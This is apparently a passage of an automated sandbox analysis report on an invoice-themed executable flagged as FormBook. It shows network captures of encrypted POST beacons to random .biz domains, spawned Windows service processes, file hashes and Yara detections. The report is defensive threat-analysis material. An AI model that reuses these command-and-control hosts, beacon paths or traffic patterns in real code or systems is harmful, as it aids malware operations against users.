                                                                                                                                                                Nov 28, 2024 12:14:21.202122927 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:23.276252031 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:22 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=05729616c5c7c743d3e0a34459642e56|8.46.123.228|1732792462|1732792462|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                31192.168.2.224920318.208.156.24880
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:25.713617086 CET359OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: yauexmxk.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:25.713659048 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:26.903322935 CET412INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:26 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=1f6c6f4d4c5247b22ef27aac1d0b707b|8.46.123.228|1732792466|1732792466|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                32192.168.2.224920413.251.16.15080
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 28, 2024 12:14:27.160298109 CET357OUTPOST /tgcwttfqletfhyq HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Host: iuzpxe.biz
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                Content-Length: 852
                                                                                                                                                                Nov 28, 2024 12:14:27.160310030 CET852OUTData Raw: de 4d ed 71 2e c9 70 45 48 03 00 00 e4 f9 5b ae c2 c3 5f 64 4b 4b 50 34 53 c3 32 47 0a 86 37 69 1c f2 bc 63 be 0c 57 fa 17 2c 6c 83 93 53 76 8a d9 67 6b 64 6c 64 a7 45 05 13 12 71 30 04 cd 9e 49 d7 3b 1b f9 08 f8 01 1c b2 67 c7 b7 a1 8e da f9 33
                                                                                                                                                                Data Ascii: Mq.pEH[_dKKP4S2G7icW,lSvgkdldEq0I;g3C_)/-PL_s +9g`9mom"*"+PU;ay.*<OT|QmrL\668Ja[osJuZ
                                                                                                                                                                Nov 28, 2024 12:14:29.268652916 CET410INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Thu, 28 Nov 2024 11:14:28 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: btst=1a21cc3742f3b8565cf5054b01655761|8.46.123.228|1732792468|1732792468|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:06:11:49
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\invoice_96.73.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'799'680 bytes
                                                                                                                                                                MD5 hash:0AD46265C37A53172D0658E862699A0E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:06:11:49
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'658'880 bytes
                                                                                                                                                                MD5 hash:38BDB885A492FB07195A5DF3F45BA0BB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:06:11:50
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\invoice_96.73.exe"
                                                                                                                                                                Imagebase:0x6f0000
                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:06:11:52
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\alg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'577'472 bytes
                                                                                                                                                                MD5 hash:D51E3C5F1FB63103D04A4FDBBC56FEE7
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:06:11:53
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'537'536 bytes
                                                                                                                                                                MD5 hash:BBA4722DF24C70555CF255FAE1A123D7
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:06:11:59
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\ehome\ehrecvr.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\ehome\ehRecvr.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'276'416 bytes
                                                                                                                                                                MD5 hash:22DA4B53195377BBE2A2460989C3D203
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:06:12:01
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'625'600 bytes
                                                                                                                                                                MD5 hash:C0B1AC1980E0EE5E641EA4C250791D87
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:14
                                                                                                                                                                Start time:06:12:03
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'269'760 bytes
                                                                                                                                                                MD5 hash:862331ACCCC3F8DC8BF248C0E6CF16A3
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:15
                                                                                                                                                                Start time:06:12:04
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\ieetwcollector.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\IEEtwCollector.exe /V
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'612'800 bytes
                                                                                                                                                                MD5 hash:475B5B41F2CFABE32500D1A9602C2A3E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:06:12:06
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'661'952 bytes
                                                                                                                                                                MD5 hash:CC9BE47A84D7EB73D78181F087D654DC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:06:12:06
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:1'639'936 bytes
                                                                                                                                                                MD5 hash:8A39539F9626492BC25BBEF9E516EC26
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:06:12:08
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'625'600 bytes
                                                                                                                                                                MD5 hash:2568F4F643C82673898904F584A264BA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:06:12:09
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                                File size:1'519'104 bytes
                                                                                                                                                                MD5 hash:4A3EAAF9D1C0E0BB3F263E7A314171FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:06:12:10
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'508'864 bytes
                                                                                                                                                                MD5 hash:16E5AF7C321FDD4D4ABCA40501F44C18
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:06:12:11
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:1'512'960 bytes
                                                                                                                                                                MD5 hash:2A428B8B0253AA1D839ED564BA512230
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:06:12:13
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\vds.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:2'029'568 bytes
                                                                                                                                                                MD5 hash:CC2DA4A13C382DA8674052AB5005C252
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:06:12:18
                                                                                                                                                                Start date:28/11/2024
                                                                                                                                                                Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                Imagebase:0x100000000
                                                                                                                                                                File size:2'083'328 bytes
                                                                                                                                                                MD5 hash:B9B616B65A90E396A161A24A8A456884
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Disassembly

                                                                                                                                                                No disassembly